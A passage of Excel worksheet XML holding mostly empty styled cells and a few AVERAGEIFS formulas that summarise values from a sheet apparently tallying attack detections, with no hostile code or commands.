      <c r="BM218" s="271"/>
      <c r="BN218" s="271"/>
      <c r="BO218" s="271"/>
      <c r="BP218" s="271"/>
      <c r="BQ218" s="271"/>
      <c r="BR218" s="271"/>
      <c r="BS218" s="271"/>
      <c r="BT218" s="271"/>
      <c r="BU218" s="271"/>
      <c r="BV218" s="271"/>
      <c r="BW218" s="271"/>
      <c r="BX218" s="271"/>
      <c r="BY218" s="271"/>
      <c r="BZ218" s="271"/>
      <c r="CA218" s="271"/>
      <c r="CB218" s="271"/>
      <c r="CC218" s="271"/>
      <c r="CD218" s="271"/>
      <c r="CE218" s="271"/>
      <c r="CF218" s="271"/>
      <c r="CG218" s="271"/>
      <c r="CH218" s="271"/>
      <c r="CI218" s="271"/>
      <c r="CJ218" s="271"/>
      <c r="CK218" s="271"/>
      <c r="CL218" s="271"/>
      <c r="CM218" s="271"/>
      <c r="CN218" s="271"/>
      <c r="CO218" s="271"/>
      <c r="CP218" s="271"/>
      <c r="CQ218" s="271"/>
      <c r="CR218" s="271"/>
      <c r="CS218" s="271"/>
      <c r="CT218" s="271"/>
      <c r="CU218" s="271"/>
      <c r="CV218" s="271"/>
      <c r="CW218" s="271"/>
      <c r="CX218" s="271"/>
      <c r="CY218" s="271"/>
      <c r="CZ218" s="271"/>
      <c r="DA218" s="271"/>
      <c r="DB218" s="271"/>
      <c r="DC218" s="271"/>
      <c r="DD218" s="271"/>
      <c r="DE218" s="271"/>
      <c r="DF218" s="271"/>
      <c r="DG218" s="271"/>
      <c r="DH218" s="271"/>
      <c r="DI218" s="271"/>
      <c r="DJ218" s="271"/>
      <c r="DK218" s="271"/>
    </row>
    <row r="219">
      <c r="K219" s="559" t="s">
        <v>2627</v>
      </c>
      <c r="L219" s="563">
        <f>N121</f>
        <v>3636.022451</v>
      </c>
      <c r="M219" s="564">
        <f>N118</f>
        <v>0.4444040772</v>
      </c>
      <c r="N219" s="562">
        <f t="shared" si="199"/>
        <v>3635.578047</v>
      </c>
      <c r="Q219" s="271"/>
      <c r="R219" s="510"/>
      <c r="S219" s="510"/>
      <c r="T219" s="510"/>
      <c r="U219" s="510"/>
      <c r="V219" s="510"/>
      <c r="W219" s="510"/>
      <c r="X219" s="271"/>
      <c r="Y219" s="271"/>
      <c r="Z219" s="271"/>
      <c r="AA219" s="271"/>
      <c r="AB219" s="271"/>
      <c r="AC219" s="271"/>
      <c r="AD219" s="271"/>
      <c r="AE219" s="271"/>
      <c r="AF219" s="271"/>
      <c r="AG219" s="271"/>
      <c r="AH219" s="352" t="s">
        <v>750</v>
      </c>
      <c r="AI219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AK219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AL219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AM219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="AN219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AO219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AP219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="AR219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AS219" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AT219" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>1</v>
      </c>
      <c r="AU219" s="271"/>
      <c r="AV219" s="271"/>
      <c r="AW219" s="271"/>
      <c r="AX219" s="271"/>
      <c r="AY219" s="271"/>
      <c r="AZ219" s="271"/>
      <c r="BA219" s="271"/>
      <c r="BB219" s="271"/>
      <c r="BC219" s="271"/>
      <c r="BD219" s="271"/>
      <c r="BE219" s="271"/>
      <c r="BF219" s="271"/>
      <c r="BG219" s="271"/>
      <c r="BH219" s="271"/>
      <c r="BI219" s="271"/>
      <c r="BJ219" s="271"/>
      <c r="BK219" s="271"/>
      <c r="BL219" s="271"/>
      <c r="BM219" s="271"/>
      <c r="BN219" s="271"/>
      <c r="BO219" s="271"/>
      <c r="BP219" s="271"/>
      <c r="BQ219" s="271"/>
      <c r="BR219" s="271"/>
      <c r="BS219" s="271"/>
      <c r="BT219" s="271"/>
      <c r="BU219" s="271"/>
      <c r="BV219" s="271"/>
      <c r="BW219" s="271"/>
      <c r="BX219" s="271"/>
      <c r="BY219" s="271"/>
      <c r="BZ219" s="271"/>
      <c r="CA219" s="271"/>
      <c r="CB219" s="271"/>
      <c r="CC219" s="271"/>
      <c r="CD219" s="271"/>
      <c r="CE219" s="271"/>
      <c r="CF219" s="271"/>
      <c r="CG219" s="271"/>
      <c r="CH219" s="271"/>
      <c r="CI219" s="271"/>
      <c r="CJ219" s="271"/>
      <c r="CK219" s="271"/>
      <c r="CL219" s="271"/>
      <c r="CM219" s="271"/>
      <c r="CN219" s="271"/>
      <c r="CO219" s="271"/>
      <c r="CP219" s="271"/>
      <c r="CQ219" s="271"/>
      <c r="CR219" s="271"/>
      <c r="CS219" s="271"/>
      <c r="CT219" s="271"/>
      <c r="CU219" s="271"/>
      <c r="CV219" s="271"/>
      <c r="CW219" s="271"/>
      <c r="CX219" s="271"/>
      <c r="CY219" s="271"/>
      <c r="CZ219" s="271"/>
      <c r="DA219" s="271"/>
      <c r="DB219" s="271"/>
      <c r="DC219" s="271"/>
      <c r="DD219" s="271"/>
      <c r="DE219" s="271"/>
      <c r="DF219" s="271"/>
      <c r="DG219" s="271"/>
      <c r="DH219" s="271"/>
      <c r="DI219" s="271"/>
      <c r="DJ219" s="271"/>
      <c r="DK219" s="271"/>
    </row>
    <row r="220">
      <c r="K220" s="559" t="s">
        <v>2628</v>
      </c>
      <c r="L220" s="563">
        <f>K130</f>
        <v>82.2387988</v>
      </c>
      <c r="M220" s="564">
        <f>K127</f>
        <v>0.0499595818</v>
      </c>
      <c r="N220" s="562">
        <f t="shared" si="199"/>
        <v>82.18883921</v>
      </c>
      <c r="Q220" s="271"/>
      <c r="R220" s="510"/>
      <c r="S220" s="510"/>
      <c r="T220" s="510"/>
      <c r="U220" s="510"/>
      <c r="V220" s="510"/>
      <c r="W220" s="510"/>
      <c r="X220" s="271"/>
      <c r="Y220" s="271"/>
      <c r="Z220" s="271"/>
      <c r="AA220" s="271"/>
      <c r="AB220" s="271"/>
      <c r="AC220" s="271"/>
      <c r="AD220" s="271"/>
      <c r="AE220" s="271"/>
      <c r="AF220" s="271"/>
      <c r="AG220" s="271"/>
      <c r="AH220" s="352" t="s">
        <v>666</v>
      </c>
      <c r="AI220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS220" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT220" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU220" s="271"/>
      <c r="AV220" s="271"/>
      <c r="AW220" s="271"/>
      <c r="AX220" s="271"/>
      <c r="AY220" s="271"/>
      <c r="AZ220" s="271"/>
      <c r="BA220" s="271"/>
      <c r="BB220" s="271"/>
      <c r="BC220" s="271"/>
      <c r="BD220" s="271"/>
      <c r="BE220" s="271"/>
      <c r="BF220" s="271"/>
      <c r="BG220" s="271"/>
      <c r="BH220" s="271"/>
      <c r="BI220" s="271"/>
      <c r="BJ220" s="271"/>
      <c r="BK220" s="271"/>
      <c r="BL220" s="271"/>
      <c r="BM220" s="271"/>
      <c r="BN220" s="271"/>
      <c r="BO220" s="271"/>
      <c r="BP220" s="271"/>
      <c r="BQ220" s="271"/>
      <c r="BR220" s="271"/>
      <c r="BS220" s="271"/>
      <c r="BT220" s="271"/>
      <c r="BU220" s="271"/>
      <c r="BV220" s="271"/>
      <c r="BW220" s="271"/>
      <c r="BX220" s="271"/>
      <c r="BY220" s="271"/>
      <c r="BZ220" s="271"/>
      <c r="CA220" s="271"/>
      <c r="CB220" s="271"/>
      <c r="CC220" s="271"/>
      <c r="CD220" s="271"/>
      <c r="CE220" s="271"/>
      <c r="CF220" s="271"/>
      <c r="CG220" s="271"/>
      <c r="CH220" s="271"/>
      <c r="CI220" s="271"/>
      <c r="CJ220" s="271"/>
      <c r="CK220" s="271"/>
      <c r="CL220" s="271"/>
      <c r="CM220" s="271"/>
      <c r="CN220" s="271"/>
      <c r="CO220" s="271"/>
      <c r="CP220" s="271"/>
      <c r="CQ220" s="271"/>
      <c r="CR220" s="271"/>
      <c r="CS220" s="271"/>
      <c r="CT220" s="271"/>
      <c r="CU220" s="271"/>
      <c r="CV220" s="271"/>
      <c r="CW220" s="271"/>
      <c r="CX220" s="271"/>
      <c r="CY220" s="271"/>
      <c r="CZ220" s="271"/>
      <c r="DA220" s="271"/>
      <c r="DB220" s="271"/>
      <c r="DC220" s="271"/>
      <c r="DD220" s="271"/>
      <c r="DE220" s="271"/>
      <c r="DF220" s="271"/>
      <c r="DG220" s="271"/>
      <c r="DH220" s="271"/>
      <c r="DI220" s="271"/>
      <c r="DJ220" s="271"/>
      <c r="DK220" s="271"/>
    </row>
    <row r="221">
      <c r="K221" s="559" t="s">
        <v>2629</v>
      </c>
      <c r="L221" s="563">
        <f>L130</f>
        <v>1922.51621</v>
      </c>
      <c r="M221" s="564">
        <f>L127</f>
        <v>0.2240707117</v>
      </c>
      <c r="N221" s="562">
        <f t="shared" si="199"/>
        <v>1922.292139</v>
      </c>
      <c r="Q221" s="271"/>
      <c r="R221" s="510"/>
      <c r="S221" s="510"/>
      <c r="T221" s="510"/>
      <c r="U221" s="510"/>
      <c r="V221" s="510"/>
      <c r="W221" s="510"/>
      <c r="X221" s="271"/>
      <c r="Y221" s="271"/>
      <c r="Z221" s="271"/>
      <c r="AA221" s="271"/>
      <c r="AB221" s="271"/>
      <c r="AC221" s="271"/>
      <c r="AD221" s="271"/>
      <c r="AE221" s="271"/>
      <c r="AF221" s="271"/>
      <c r="AG221" s="271"/>
      <c r="AH221" s="352" t="s">
        <v>892</v>
      </c>
      <c r="AI221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AK221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AL221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AM221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AN221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AO221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AP221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AR221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>0</v>
      </c>
      <c r="AS221" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AT221" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="AU221" s="271"/>
      <c r="AV221" s="271"/>
      <c r="AW221" s="271"/>
      <c r="AX221" s="271"/>
      <c r="AY221" s="271"/>
      <c r="AZ221" s="271"/>
      <c r="BA221" s="271"/>
      <c r="BB221" s="271"/>
      <c r="BC221" s="271"/>
      <c r="BD221" s="271"/>
      <c r="BE221" s="271"/>
      <c r="BF221" s="271"/>
      <c r="BG221" s="271"/>
      <c r="BH221" s="271"/>
      <c r="BI221" s="271"/>
      <c r="BJ221" s="271"/>
      <c r="BK221" s="271"/>
      <c r="BL221" s="271"/>
      <c r="BM221" s="271"/>
      <c r="BN221" s="271"/>
      <c r="BO221" s="271"/>
      <c r="BP221" s="271"/>
      <c r="BQ221" s="271"/>
      <c r="BR221" s="271"/>
      <c r="BS221" s="271"/>
      <c r="BT221" s="271"/>
      <c r="BU221" s="271"/>
      <c r="BV221" s="271"/>
      <c r="BW221" s="271"/>
      <c r="BX221" s="271"/>
      <c r="BY221" s="271"/>
      <c r="BZ221" s="271"/>
      <c r="CA221" s="271"/>
      <c r="CB221" s="271"/>
      <c r="CC221" s="271"/>
      <c r="CD221" s="271"/>
      <c r="CE221" s="271"/>
      <c r="CF221" s="271"/>
      <c r="CG221" s="271"/>
      <c r="CH221" s="271"/>
      <c r="CI221" s="271"/>
      <c r="CJ221" s="271"/>
      <c r="CK221" s="271"/>
      <c r="CL221" s="271"/>
      <c r="CM221" s="271"/>
      <c r="CN221" s="271"/>
      <c r="CO221" s="271"/>
      <c r="CP221" s="271"/>
      <c r="CQ221" s="271"/>
      <c r="CR221" s="271"/>
      <c r="CS221" s="271"/>
      <c r="CT221" s="271"/>
      <c r="CU221" s="271"/>
      <c r="CV221" s="271"/>
      <c r="CW221" s="271"/>
      <c r="CX221" s="271"/>
      <c r="CY221" s="271"/>
      <c r="CZ221" s="271"/>
      <c r="DA221" s="271"/>
      <c r="DB221" s="271"/>
      <c r="DC221" s="271"/>
      <c r="DD221" s="271"/>
      <c r="DE221" s="271"/>
      <c r="DF221" s="271"/>
      <c r="DG221" s="271"/>
      <c r="DH221" s="271"/>
      <c r="DI221" s="271"/>
      <c r="DJ221" s="271"/>
      <c r="DK221" s="271"/>
    </row>
    <row r="222">
      <c r="K222" s="559" t="s">
        <v>2630</v>
      </c>
      <c r="L222" s="563">
        <f>M130</f>
        <v>58487.97851</v>
      </c>
      <c r="M222" s="564">
        <f>M127</f>
        <v>0.3783550506</v>
      </c>
      <c r="N222" s="562">
        <f t="shared" si="199"/>
        <v>58487.60016</v>
      </c>
      <c r="Q222" s="271"/>
      <c r="R222" s="510"/>
      <c r="S222" s="510"/>
      <c r="T222" s="510"/>
      <c r="U222" s="510"/>
      <c r="V222" s="510"/>
      <c r="W222" s="510"/>
      <c r="X222" s="271"/>
      <c r="Y222" s="271"/>
      <c r="Z222" s="271"/>
      <c r="AA222" s="271"/>
      <c r="AB222" s="271"/>
      <c r="AC222" s="271"/>
      <c r="AD222" s="271"/>
      <c r="AE222" s="271"/>
      <c r="AF222" s="271"/>
      <c r="AG222" s="271"/>
      <c r="AH222" s="352" t="s">
        <v>1214</v>
      </c>
      <c r="AI222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AK222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AL222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AM222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AN222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AO222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AP222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AR222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="AS222" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AT222" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>1</v>
      </c>
      <c r="AU222" s="271"/>
      <c r="AV222" s="271"/>
      <c r="AW222" s="271"/>
      <c r="AX222" s="271"/>
      <c r="AY222" s="271"/>
      <c r="AZ222" s="271"/>
      <c r="BA222" s="271"/>
      <c r="BB222" s="271"/>
      <c r="BC222" s="271"/>
      <c r="BD222" s="271"/>
      <c r="BE222" s="271"/>
      <c r="BF222" s="271"/>
      <c r="BG222" s="271"/>
      <c r="BH222" s="271"/>
      <c r="BI222" s="271"/>
      <c r="BJ222" s="271"/>
      <c r="BK222" s="271"/>
      <c r="BL222" s="271"/>
      <c r="BM222" s="271"/>
      <c r="BN222" s="271"/>
      <c r="BO222" s="271"/>
      <c r="BP222" s="271"/>
      <c r="BQ222" s="271"/>
      <c r="BR222" s="271"/>
      <c r="BS222" s="271"/>
      <c r="BT222" s="271"/>
      <c r="BU222" s="271"/>
      <c r="BV222" s="271"/>
      <c r="BW222" s="271"/>
      <c r="BX222" s="271"/>
      <c r="BY222" s="271"/>
      <c r="BZ222" s="271"/>
      <c r="CA222" s="271"/>
      <c r="CB222" s="271"/>
      <c r="CC222" s="271"/>
      <c r="CD222" s="271"/>
      <c r="CE222" s="271"/>
      <c r="CF222" s="271"/>
      <c r="CG222" s="271"/>
      <c r="CH222" s="271"/>
      <c r="CI222" s="271"/>
      <c r="CJ222" s="271"/>
      <c r="CK222" s="271"/>
      <c r="CL222" s="271"/>
      <c r="CM222" s="271"/>
      <c r="CN222" s="271"/>
      <c r="CO222" s="271"/>
      <c r="CP222" s="271"/>
      <c r="CQ222" s="271"/>
      <c r="CR222" s="271"/>
      <c r="CS222" s="271"/>
      <c r="CT222" s="271"/>
      <c r="CU222" s="271"/>
      <c r="CV222" s="271"/>
      <c r="CW222" s="271"/>
      <c r="CX222" s="271"/>
      <c r="CY222" s="271"/>
      <c r="CZ222" s="271"/>
      <c r="DA222" s="271"/>
      <c r="DB222" s="271"/>
      <c r="DC222" s="271"/>
      <c r="DD222" s="271"/>
      <c r="DE222" s="271"/>
      <c r="DF222" s="271"/>
      <c r="DG222" s="271"/>
      <c r="DH222" s="271"/>
      <c r="DI222" s="271"/>
      <c r="DJ222" s="271"/>
      <c r="DK222" s="271"/>
    </row>
    <row r="223">
      <c r="K223" s="565" t="s">
        <v>2631</v>
      </c>
      <c r="L223" s="566">
        <f>N130</f>
        <v>62142.71276</v>
      </c>
      <c r="M223" s="567">
        <f>N127</f>
        <v>0.4445645393</v>
      </c>
      <c r="N223" s="568">
        <f t="shared" si="199"/>
        <v>62142.26819</v>
      </c>
      <c r="Q223" s="271"/>
      <c r="R223" s="510"/>
      <c r="S223" s="510"/>
      <c r="T223" s="510"/>
      <c r="U223" s="510"/>
      <c r="V223" s="510"/>
      <c r="W223" s="510"/>
      <c r="X223" s="271"/>
      <c r="Y223" s="271"/>
      <c r="Z223" s="271"/>
      <c r="AA223" s="271"/>
      <c r="AB223" s="271"/>
      <c r="AC223" s="271"/>
      <c r="AD223" s="271"/>
      <c r="AE223" s="271"/>
      <c r="AF223" s="271"/>
      <c r="AG223" s="271"/>
      <c r="AH223" s="352" t="s">
        <v>1293</v>
      </c>
      <c r="AI223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS223" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT223" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU223" s="271"/>
      <c r="AV223" s="271"/>
      <c r="AW223" s="271"/>
      <c r="AX223" s="271"/>
      <c r="AY223" s="271"/>
      <c r="AZ223" s="271"/>
      <c r="BA223" s="271"/>
      <c r="BB223" s="271"/>
      <c r="BC223" s="271"/>
      <c r="BD223" s="271"/>
      <c r="BE223" s="271"/>
      <c r="BF223" s="271"/>
      <c r="BG223" s="271"/>
      <c r="BH223" s="271"/>
      <c r="BI223" s="271"/>
      <c r="BJ223" s="271"/>
      <c r="BK223" s="271"/>
      <c r="BL223" s="271"/>
      <c r="BM223" s="271"/>
      <c r="BN223" s="271"/>
      <c r="BO223" s="271"/>
      <c r="BP223" s="271"/>
      <c r="BQ223" s="271"/>
      <c r="BR223" s="271"/>
      <c r="BS223" s="271"/>
      <c r="BT223" s="271"/>
      <c r="BU223" s="271"/>
      <c r="BV223" s="271"/>
      <c r="BW223" s="271"/>
      <c r="BX223" s="271"/>
      <c r="BY223" s="271"/>
      <c r="BZ223" s="271"/>
      <c r="CA223" s="271"/>
      <c r="CB223" s="271"/>
      <c r="CC223" s="271"/>
      <c r="CD223" s="271"/>
      <c r="CE223" s="271"/>
      <c r="CF223" s="271"/>
      <c r="CG223" s="271"/>
      <c r="CH223" s="271"/>
      <c r="CI223" s="271"/>
      <c r="CJ223" s="271"/>
      <c r="CK223" s="271"/>
      <c r="CL223" s="271"/>
      <c r="CM223" s="271"/>
      <c r="CN223" s="271"/>
      <c r="CO223" s="271"/>
      <c r="CP223" s="271"/>
      <c r="CQ223" s="271"/>
      <c r="CR223" s="271"/>
      <c r="CS223" s="271"/>
      <c r="CT223" s="271"/>
      <c r="CU223" s="271"/>
      <c r="CV223" s="271"/>
      <c r="CW223" s="271"/>
      <c r="CX223" s="271"/>
      <c r="CY223" s="271"/>
      <c r="CZ223" s="271"/>
      <c r="DA223" s="271"/>
      <c r="DB223" s="271"/>
      <c r="DC223" s="271"/>
      <c r="DD223" s="271"/>
      <c r="DE223" s="271"/>
      <c r="DF223" s="271"/>
      <c r="DG223" s="271"/>
      <c r="DH223" s="271"/>
      <c r="DI223" s="271"/>
      <c r="DJ223" s="271"/>
      <c r="DK223" s="271"/>
    </row>
    <row r="224">
      <c r="L224" s="569"/>
      <c r="M224" s="569"/>
      <c r="Q224" s="271"/>
      <c r="R224" s="510"/>
      <c r="S224" s="510"/>
      <c r="T224" s="510"/>
      <c r="U224" s="510"/>
      <c r="V224" s="510"/>
      <c r="W224" s="510"/>
      <c r="X224" s="271"/>
      <c r="Y224" s="271"/>
      <c r="Z224" s="271"/>
      <c r="AA224" s="271"/>
      <c r="AB224" s="271"/>
      <c r="AC224" s="271"/>
      <c r="AD224" s="271"/>
      <c r="AE224" s="271"/>
      <c r="AF224" s="271"/>
      <c r="AG224" s="271"/>
      <c r="AH224" s="352" t="s">
        <v>1331</v>
      </c>
      <c r="AI224" s="518">
